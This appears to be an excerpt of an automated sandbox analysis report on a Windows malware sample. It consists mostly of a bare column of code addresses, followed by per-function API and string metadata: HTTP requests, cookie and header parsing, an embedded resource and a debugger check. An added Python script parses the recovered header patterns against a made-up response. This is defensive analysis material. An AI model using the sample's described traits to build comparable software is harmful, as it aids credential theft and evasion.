                                  0x00bd656a
                                  0x00bd656a
                                  0x00000000
                                  0x00bd656a
                                  0x00bd6526
                                  0x00bd6526
                                  0x00bd652c
                                  0x00bd6533
                                  0x00bd6535
                                  0x00bd653b
                                  0x00bd6551
                                  0x00bd6551
                                  0x00bd6553
                                  0x00bd6558
                                  0x00000000
                                  0x00bd653d
                                  0x00bd653d
                                  0x00bd6540
                                  0x00bd6548
                                  0x00bd654b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd654b
                                  0x00bd653b
                                  0x00bd6451
                                  0x00bd6451
                                  0x00bd6453
                                  0x00bd64ba
                                  0x00bd64ce
                                  0x00bd64d0
                                  0x00bd64d3
                                  0x00bd64d9
                                  0x00bd64ef
                                  0x00bd64ef
                                  0x00bd64f1
                                  0x00bd64f6
                                  0x00bd64f9
                                  0x00bd6503
                                  0x00bd650d
                                  0x00000000
                                  0x00bd64db
                                  0x00bd64db
                                  0x00bd64de
                                  0x00bd64e6
                                  0x00bd64e9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd64e9
                                  0x00bd6455
                                  0x00bd6455
                                  0x00bd6458
                                  0x00bd6458
                                  0x00bd645a
                                  0x00bd645d
                                  0x00000000
                                  0x00bd645f
                                  0x00bd645f
                                  0x00bd6462
                                  0x00bd6469
                                  0x00bd646f
                                  0x00bd6487
                                  0x00bd6487
                                  0x00bd6489
                                  0x00bd648e
                                  0x00bd6494
                                  0x00000000
                                  0x00bd6471
                                  0x00bd6471
                                  0x00bd6474
                                  0x00bd647c
                                  0x00bd647f
                                  0x00000000
                                  0x00bd6485
                                  0x00bd6485
                                  0x00000000
                                  0x00bd6485
                                  0x00bd647f
                                  0x00bd646f
                                  0x00000000
                                  0x00bd6497
                                  0x00bd6499
                                  0x00bd64a0
                                  0x00bd64a4
                                  0x00bd64aa
                                  0x00bd64b0
                                  0x00bd64b0
                                  0x00bd64b4
                                  0x00000000
                                  0x00bd64b4
                                  0x00bd6453
                                  0x00bd644b
                                  0x00000000
                                  0x00bd6369
                                  0x00000000
                                  0x00bd6354
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd59da
                                  0x00bd59cf
                                  0x00bd574d
                                  0x00bd574d
                                  0x00bd5753
                                  0x00bd5757
                                  0x00bd575e
                                  0x00bd5764
                                  0x00bd5766
                                  0x00bd6575
                                  0x00bd6575
                                  0x00bd657b
                                  0x00bd6581
                                  0x00000000
                                  0x00bd576c
                                  0x00bd576c
                                  0x00bd5772
                                  0x00bd5774
                                  0x00bd585d
                                  0x00bd5863
                                  0x00bd5865
                                  0x00bd5876
                                  0x00bd5880
                                  0x00bd5886
                                  0x00bd588e
                                  0x00bd58a0
                                  0x00bd58a5
                                  0x00bd58b1
                                  0x00bd58b4
                                  0x00bd58ba
                                  0x00bd58bc
                                  0x00bd58cc
                                  0x00bd58de
                                  0x00bd58e9
                                  0x00bd58ec
                                  0x00bd58ec
                                  0x00bd58f4
                                  0x00bd5903
                                  0x00bd5909
                                  0x00bd590b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd590b
                                  0x00bd577a
                                  0x00bd577a
                                  0x00bd577e
                                  0x00bd5781
                                  0x00bd5787
                                  0x00bd578a
                                  0x00bd5794
                                  0x00bd579e
                                  0x00bd57a8
                                  0x00bd57b2
                                  0x00bd57bc
                                  0x00bd57c4
                                  0x00bd57ce
                                  0x00bd57d0
                                  0x00bd57d0
                                  0x00bd57e4
                                  0x00bd57ea
                                  0x00bd57ec
                                  0x00bd590d
                                  0x00bd5913
                                  0x00bd57f2
                                  0x00bd57f4
                                  0x00bd57fe
                                  0x00bd5804
                                  0x00bd5806
                                  0x00bd5815
                                  0x00bd5821
                                  0x00bd582b
                                  0x00bd582e
                                  0x00bd582e
                                  0x00bd5834
                                  0x00bd5840
                                  0x00bd5842
                                  0x00bd5845
                                  0x00bd5845
                                  0x00bd5847
                                  0x00bd584d
                                  0x00bd584f
                                  0x00bd5856
                                  0x00bd5856
                                  0x00bd584f
                                  0x00bd5919
                                  0x00bd5919
                                  0x00bd5925
                                  0x00bd5927
                                  0x00bd592a
                                  0x00bd592a
                                  0x00bd592c
                                  0x00bd5932
                                  0x00bd5934
                                  0x00bd5937
                                  0x00bd5937
                                  0x00bd5934
                                  0x00bd5939
                                  0x00bd593f
                                  0x00bd5941
                                  0x00bd5944
                                  0x00bd5944
                                  0x00bd594a
                                  0x00bd5951
                                  0x00bd5957
                                  0x00bd595d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd595d
                                  0x00bd5766
                                  0x00bd5558
                                  0x00bd5558
                                  0x00bd555c
                                  0x00bd5571
                                  0x00bd557b
                                  0x00bd5582
                                  0x00bd5587
                                  0x00bd558b
                                  0x00bd5591
                                  0x00bd5598
                                  0x00bd559a
                                  0x00bd559a
                                  0x00bd55ad
                                  0x00bd55b2
                                  0x00bd55ca
                                  0x00bd55d3
                                  0x00bd55d9
                                  0x00bd55db
                                  0x00bd55dd
                                  0x00bd55e3
                                  0x00bd55e3
                                  0x00bd55e9
                                  0x00bd55ed
                                  0x00bd55f3
                                  0x00bd55f6
                                  0x00000000
                                  0x00bd55f8
                                  0x00bd55f8
                                  0x00bd55fe
                                  0x00bd5605
                                  0x00bd5607
                                  0x00bd560d
                                  0x00bd5623
                                  0x00bd5623
                                  0x00bd5625
                                  0x00bd562a
                                  0x00000000
                                  0x00bd560f
                                  0x00bd560f
                                  0x00bd5612
                                  0x00bd561a
                                  0x00bd561d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00bd561d
                                  0x00bd560d
                                  0x00bd55f6
                                  0x00000000
                                  0x00bd5552
                                  0x00bd658c
                                  0x00000000
                                  0x00bd658c
                                  0x00bd54c8
                                  0x00bd547e
                                  0x00bd5315
                                  0x00bd5315
                                  0x00bd531c
                                  0x00bd5322
                                  0x00bd5324
                                  0x00bd5324
                                  0x00bd532f
                                  0x00bd5335
                                  0x00bd5337
                                  0x00bd5339
                                  0x00000000
                                  0x00bd533b
                                  0x00bd533b
                                  0x00bd65b5
                                  0x00bd65b5
                                  0x00bd65bb
                                  0x00bd65c2
                                  0x00bd65c2
                                  0x00bd65c8
                                  0x00bd65cb
                                  0x00bd65fe
                                  0x00000000
                                  0x00bd65cd
                                  0x00bd65cd
                                  0x00bd65d3
                                  0x00bd65da
                                  0x00bd65dc
                                  0x00bd65e2
                                  0x00bd65f4
                                  0x00bd65f4
                                  0x00bd65f6
                                  0x00000000
                                  0x00bd65e4
                                  0x00bd65e4
                                  0x00bd65e7
                                  0x00bd65ef
                                  0x00bd65f2
                                  0x00bd6621
                                  0x00bd6621
                                  0x00bd6626
                                  0x00bd6627
                                  0x00bd6628
                                  0x00bd6629
                                  0x00bd662a
                                  0x00bd662b
                                  0x00bd662c
                                  0x00bd662d
                                  0x00bd662e
                                  0x00bd662f
                                  0x00bd6630
                                  0x00bd6631
                                  0x00bd6633
                                  0x00bd6635
                                  0x00bd6640
                                  0x00bd6641
                                  0x00bd6644
                                  0x00bd6649
                                  0x00bd664b
                                  0x00bd664e
                                  0x00bd664f
                                  0x00bd6650
                                  0x00bd6651
                                  0x00bd6655
                                  0x00bd665b
                                  0x00bd665e
                                  0x00bd6661
                                  0x00bd6664
                                  0x00bd6670
                                  0x00bd6675
                                  0x00bd6679
                                  0x00bd6682
                                  0x00bd6685
                                  0x00bd6687
                                  0x00bd6689
                                  0x00bd6689
                                  0x00bd668a
                                  0x00bd668a
                                  0x00bd668f
                                  0x00bd6694
                                  0x00bd6699
                                  0x00bd669e
                                  0x00bd66a1
                                  0x00bd66a3
                                  0x00bd66a6
                                  0x00bd66a8
                                  0x00bd67cd
                                  0x00bd66ae
                                  0x00bd66ae
                                  0x00bd66b1
                                  0x00bd66b4
                                  0x00bd66b7
                                  0x00bd66b7
                                  0x00bd66b9
                                  0x00bd66bc
                                  0x00bd66c0
                                  0x00bd66c0
                                  0x00bd66c2
                                  0x00bd66c4
                                  0x00bd66e1
                                  0x00bd66c6
                                  0x00bd66dc
                                  0x00bd66dc
                                  0x00bd66e6
                                  0x00bd66e9
                                  [Control-flow graph listing omitted: only the basic-block address column survived extraction (addresses 0x00BD5272 through 0x00BD6D49 in this excerpt, plus 0x00000000 placeholder rows); the disassembly text is not present on the page.]

                                  APIs
                                  • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000), ref: 00BD532F
                                  • GetLastError.KERNEL32 ref: 00BD533B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHttpLastOpen
                                  • String ID: <$Content-Length: {[0-9]+}$Cookie: $GET$Location: {[0-9]+}$POST$Set-Cookie:\b*{.+?}\n$charset={[A-Za-z0-9\-_]+}$utf-8${</html>}${<html>}
                                  • API String ID: 377367503-1096743455
                                  • Opcode ID: a4132a4f129798fa624973b48dc136b55aa80bf06eca1e198f5cd3672be7afb6
                                  • Instruction ID: 528592aa65abb9733495732e93c9f544735771af751af8f44151b22ea0c16af1
                                  • Opcode Fuzzy Hash: a4132a4f129798fa624973b48dc136b55aa80bf06eca1e198f5cd3672be7afb6
                                  • Instruction Fuzzy Hash: B5B27F70A006599BDB28DF24DC45BEAF7B5FF04304F1041DAE549A7281EBB4AAD4CF91
                                  Uniqueness

                                  Uniqueness Score: 100.00%
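
                                  The String ID list above is the most informative part of this function's metadata: alongside WinHttpOpen it carries a set of response-parsing patterns (Content-Length, Location, Set-Cookie, charset, and the <html>/</html> markers). The following Python script is an added illustration written for this report, not code recovered from the sample, that applies those exact patterns to a constructed HTTP response so an analyst can see what the function is equipped to extract. Two assumptions are made and marked in the code: the sample's pattern language uses `{...}` for capture groups, and `\b*` in the Set-Cookie pattern denotes optional blank space (Python's `re` rejects a repeated `\b`). Note that the Location pattern as recovered only captures a leading run of digits, so a URL-valued Location header yields no match.

```python
"""Apply the response-parsing patterns recovered from the sample to a constructed
HTTP response. Added example for this report; not the sample's own code."""
import re

# Patterns copied verbatim from the report's "String ID" list for this function.
SAMPLE_PATTERNS = {
    "content_length": r"Content-Length: {[0-9]+}",
    "location":       r"Location: {[0-9]+}",
    "set_cookie":     r"Set-Cookie:\b*{.+?}\n",
    "charset":        r"charset={[A-Za-z0-9\-_]+}",
    "html_open":      r"{<html>}",
    "html_close":     r"{</html>}",
}

# Constructed sample response (not captured from the sandbox run).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 31\r\n"
    "Set-Cookie: sid=abc123; Path=/\r\n"
    "Set-Cookie: lang=en\r\n"
    "Location: https://example.invalid/next\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)


def to_python_regex(pattern: str) -> "re.Pattern[str]":
    """Translate the sample library's pattern syntax into a Python regex."""
    # Assumption: '{...}' marks a capture group in the sample's pattern language.
    py = pattern.replace("{", "(").replace("}", ")")
    # Assumption: '\b*' means "any amount of blank"; Python's re rejects '\b*'.
    py = py.replace(r"\b*", r"[ \t]*")
    return re.compile(py)


def parse_response(raw: str) -> dict:
    """Extract the fields the recovered patterns target from a raw HTTP response."""
    rx = {name: to_python_regex(pat) for name, pat in SAMPLE_PATTERNS.items()}
    result = {}

    m = rx["content_length"].search(raw)
    result["content_length"] = int(m.group(1)) if m else None

    # Only a leading run of digits is captured, so a URL value does not match.
    m = rx["location"].search(raw)
    result["location"] = m.group(1) if m else None

    # Lazy '.+?' stops at the first '\n'; the '\r' of CRLF is stripped here.
    result["cookies"] = [c.strip() for c in rx["set_cookie"].findall(raw)]

    m = rx["charset"].search(raw)
    result["charset"] = m.group(1) if m else None

    # Body is delimited by the <html> ... </html> markers rather than by length.
    start = rx["html_open"].search(raw)
    end = rx["html_close"].search(raw)
    result["html"] = raw[start.start():end.end()] if start and end else None
    return result


if __name__ == "__main__":
    for key, value in parse_response(SAMPLE_RESPONSE).items():
        print(f"{key}: {value!r}")
```

Running the script prints the parsed fields; the cookie and charset patterns behave as expected on CRLF-terminated headers, while `Location: {[0-9]+}` returns no match for a URL, which is worth remembering before assuming the function follows redirects on its own.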

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00C04253,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C0E3DF
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C04253,?,?,?,00000055,?,-00000050,?,?), ref: 00C0E40A
                                  • _wcschr.LIBVCRUNTIME ref: 00C0E49E
                                  • _wcschr.LIBVCRUNTIME ref: 00C0E4AC
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C0E56D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 4147378913-905460609
                                  • Opcode ID: 71ac8bae55bf2175679925ce1d8c41190dbfe79d0cc02b1f27f3a0084cdbc370
                                  • Instruction ID: 146d44266fb0933737d29cc06b77873c1969b3a0c68e858e03a384e5ec51f49d
                                  • Opcode Fuzzy Hash: 71ac8bae55bf2175679925ce1d8c41190dbfe79d0cc02b1f27f3a0084cdbc370
                                  • Instruction Fuzzy Hash: 8571F731680306AAE724AB75CC46BBB77A8EF49704F144C69F916DB1C1FB70EA40DB61
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 4b1996d51f35ce62809cae86b6528e0101e919a90051aeb177bb3d6c9d4de56f
                                  • Instruction ID: ac2988672236dcb68e48e231aeb0e95b683bb1abf889a5182dd066f80413a5b1
                                  • Opcode Fuzzy Hash: 4b1996d51f35ce62809cae86b6528e0101e919a90051aeb177bb3d6c9d4de56f
                                  • Instruction Fuzzy Hash: 8BC24975E046288FDB24CE28DD407EAB3B5EB4A305F1441EAD85DE7240E778AED5AF40
                                  Uniqueness

                                  Uniqueness Score: 0.09%

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00C0EDC8,00000002,00000000,?,?,?,00C0EDC8,?,00000000), ref: 00C0EB43
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00C0EDC8,00000002,00000000,?,?,?,00C0EDC8,?,00000000), ref: 00C0EB6C
                                  • GetACP.KERNEL32(?,?,00C0EDC8,?,00000000), ref: 00C0EB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 1553b80005686e40e7d37cb3d9fbffb9b6016e3c9ba34bfb41f01eb5161cde62
                                  • Instruction ID: 9da916da06d936bc324095f76597eb4c3d5a6226ea8c559cb71a762e5c215a30
                                  • Opcode Fuzzy Hash: 1553b80005686e40e7d37cb3d9fbffb9b6016e3c9ba34bfb41f01eb5161cde62
                                  • Instruction Fuzzy Hash: 9421D322780111EBDB348F56C940BEB77A6BF54B64F268824E91BC7290E732DF40D354
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                    • Part of subcall function 00C06F6D: _free.LIBCMT ref: 00C06FCF
                                    • Part of subcall function 00C06F6D: _free.LIBCMT ref: 00C07005
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C0ED8B
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00C0EDD4
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00C0EDE3
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C0EE2B
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C0EE4A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                  • API String ID: 949163717-0
                                  • Opcode ID: 74d85865fd8c1060b21be00e87c9ac52e093e086bcb63df6341daf403a67bd44
                                  • Instruction ID: 62f4ed4d54c6013e9ebf453bf42d37a1b0069d0d6cb004fbdf51fed1617cc190
                                  • Opcode Fuzzy Hash: 74d85865fd8c1060b21be00e87c9ac52e093e086bcb63df6341daf403a67bd44
                                  • Instruction Fuzzy Hash: BA516D71A40319ABDB20EFA5DC41BBE77B8FF09700F184869B925E71D1E7709A44CB61
                                  Uniqueness
                                  • Uniqueness Score: 0.13%

                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C0128D
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C01297
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C012A4
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 7e1047e8c8c0ce1729b20f27e5d54e4a9e7be704a437cabee24ec2d7cb212521
                                  • Instruction ID: 5e7c18dedbef946dd96ab942aea0bf192cf18bbcb11d6cad47429fec9bf67daa
                                  • Opcode Fuzzy Hash: 7e1047e8c8c0ce1729b20f27e5d54e4a9e7be704a437cabee24ec2d7cb212521
                                  • Instruction Fuzzy Hash: F231B17490122CABCB21DF64D8897DDBBF8BF08310F5041EAE91CA7291EB709B858F45
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                  • LoadResource.KERNEL32(00000000,00000000,00000001,00000000,00000001,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?), ref: 00BD3FBC
                                  • LockResource.KERNEL32(00000000,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?,?,?,?,/api/req/res,0000000C), ref: 00BD3FC7
                                  • SizeofResource.KERNEL32(00000000,00000000,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?,?,?,?,/api/req/res), ref: 00BD3FD5
                                  Similarity
                                  • API ID: Resource$LoadLockSizeof
                                  • API String ID: 2853612939-0
                                  • Opcode ID: 1d131ac94f86875a7531f0cf07510b6df0fe3784b0d49bffb31cecaa2259bf7a
                                  • Instruction ID: 2088143198f1ae1111bd6e0bfe0db2fae3825bb12d7cab3dda1cd506cc92bb16
                                  • Opcode Fuzzy Hash: 1d131ac94f86875a7531f0cf07510b6df0fe3784b0d49bffb31cecaa2259bf7a
                                  • Instruction Fuzzy Hash: 5EF04633A012255B8B301B5AAC58ABBF7ECEB85725301497BFA0AD3210F672DC4082D0
                                  Uniqueness
                                  • Uniqueness Score: 0.24%

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000), ref: 00BD4130
                                  • __Init_thread_footer.LIBCMT ref: 00BD415B
                                    • Part of subcall function 00BF45F5: EnterCriticalSection.KERNEL32(00C2F1D8,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF4600
                                    • Part of subcall function 00BF45F5: LeaveCriticalSection.KERNEL32(00C2F1D8,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF463D
                                  • __Init_thread_footer.LIBCMT ref: 00BD41CD
                                  Similarity
                                  • API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
                                  • API String ID: 3363689876-0
                                  • Opcode ID: ac006cc97c3da1f4734513d9f033ce1c425da5d81924e15e11f43d03a6975999
                                  • Instruction ID: 1091aa7cf7ccb86b3861e65eb383dff6f465344f2a781fbc11c45f4aefdc1600
                                  • Opcode Fuzzy Hash: ac006cc97c3da1f4734513d9f033ce1c425da5d81924e15e11f43d03a6975999
                                  • Instruction Fuzzy Hash: 58115EB3560700CFE390EF68AC6779E3BE0E726720F3441A5D295572A1E3B05488EB52
                                  Uniqueness
                                  • Uniqueness Score: 8.94%

                                  Similarity
                                  • Opcode ID: 4ff58f259cf8b1458e23932582cbed66111991d9305575332ac2f5ab185b11b1
                                  • Instruction ID: d15a0050c22d5637b8e963cff78bdf53d790230f455013b95c25405b61d285b2
                                  • Opcode Fuzzy Hash: 4ff58f259cf8b1458e23932582cbed66111991d9305575332ac2f5ab185b11b1
                                  • Instruction Fuzzy Hash: 5BF14071E012199FDF14CFA9C8807AEB7B1FF49314F268269D929A7385D731AE41CB90
                                  Uniqueness
                                  • Uniqueness Score: 0.00%

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00BDECE9
                                  • CoCreateInstance.OLE32(00C1A2C0,00000000,00000001,00C1A2B0,?), ref: 00BDED08
                                  Similarity
                                  • API ID: CreateInitializeInstance
                                  • API String ID: 3519745914-0
                                  • Opcode ID: 141d7a9828a71b25d0530bcc8f008abaae59d07222071255143ea1a91314e5cd
                                  • Instruction ID: bbea50e39921656749cc09d746a0f940e4a9948b844f0d7b46bfc13cd86241ab
                                  • Opcode Fuzzy Hash: 141d7a9828a71b25d0530bcc8f008abaae59d07222071255143ea1a91314e5cd
                                  • Instruction Fuzzy Hash: 69812875E002089FDB00DFA8C948BEDB7B9FF49314F1445A9E819AB391DB36A945CF60
                                  Uniqueness
                                  • Uniqueness Score: 1.15%

                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C1018D,?,?,00000008,?,?,00C15263,00000000), ref: 00C103BF
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • API String ID: 3997070919-0
                                  • Opcode ID: afeae955f0910acf49c22b4272a532969a2757269b750ac400aac1526b36d423
                                  • Instruction ID: 99c835564165704eb89a2f644dbeb1a6e67173887ef25629a79a6d5382710145
                                  • Opcode Fuzzy Hash: afeae955f0910acf49c22b4272a532969a2757269b750ac400aac1526b36d423
                                  • Instruction Fuzzy Hash: 5DB15D31210608DFD714CF28C48ABA57BA0FF46364F758658E9A9CF2A1C375EAD2DB40
                                  Uniqueness
                                  • Uniqueness Score: 0.03%

                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BF501D
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • API String ID: 2325560087-0
                                  • Opcode ID: c2c12b2d0cb2fd6a1159a1123eeaa3fe854f05676f3ac754ce0b1c0c7dcf7704
                                  • Instruction ID: 62950c99e17fb202d0b1c348fcb05fb624f9fba9293f9aa5990aa6d0dce2c2f9
                                  • Opcode Fuzzy Hash: c2c12b2d0cb2fd6a1159a1123eeaa3fe854f05676f3ac754ce0b1c0c7dcf7704
                                  • Instruction Fuzzy Hash: 6151B6B1910A098FDB34CF58D985BAEBBF0FB44310F24857ACA45FB250D3B49A46DB90
                                  Uniqueness
                                  • Uniqueness Score: 0.07%

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E731,00000001,00000000,?,-00000050,?,00C0ED5F,00000000,?,?,?,00000055,?), ref: 00C0E67D
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 9b403fb12938bd48fc365c736311c9974ed775c057ac384597950415141114c0
                                  • Instruction ID: 01342bf87b3e800739442424a270584a48907ab7022d66c9dd31353b28dd976b
                                  • Opcode Fuzzy Hash: 9b403fb12938bd48fc365c736311c9974ed775c057ac384597950415141114c0
                                  • Instruction Fuzzy Hash: 7911293A2007055FDB189F39D8916BAB791FF80318B19482DE95747B80D7727942CB40
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E984,00000001,?,?,-00000050,?,00C0ED23,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C0E6F0
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 848d272f012589327e3b8f797199107b5d08630cd1587faaac05653d982f6fb3
                                  • Instruction ID: 6419d9930c29970b564d161dcd1538afee9e0622aa98235078f50fa4212ea02b
                                  • Opcode Fuzzy Hash: 848d272f012589327e3b8f797199107b5d08630cd1587faaac05653d982f6fb3
                                  • Instruction Fuzzy Hash: 48F0F6363403045FDB245F39D885B7A7B95FF80768F05482DF9458B6D1D6729D02D650
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                    • Part of subcall function 00C052FB: EnterCriticalSection.KERNEL32(?,?,00C02803,00000000,00C2CDD0,0000000C,00C027CA,?,?,00C068A9,?,?,00C0710F,00000001,00000364,00000006), ref: 00C0530A
                                  • EnumSystemLocalesW.KERNEL32(00C09389,00000001,00C2D030,0000000C,00C097B4,00000000), ref: 00C093CE
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • API String ID: 1272433827-0
                                  • Opcode ID: e869ccb1de98f8aadcfb17433c82aa02881036930e81128dc17152c964bf8d7b
                                  • Instruction ID: fc4fc7944ede7a7f378619c716de6480e084635ab910e2b273b481869b6f5847
                                  • Opcode Fuzzy Hash: e869ccb1de98f8aadcfb17433c82aa02881036930e81128dc17152c964bf8d7b
                                  • Instruction Fuzzy Hash: 95F04932A10204DFDB10DF98E942B9DB7F0EB49720F10412AF511DB2E1CB755902DF50
                                  Uniqueness
                                  • Uniqueness Score: 0.02%

                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
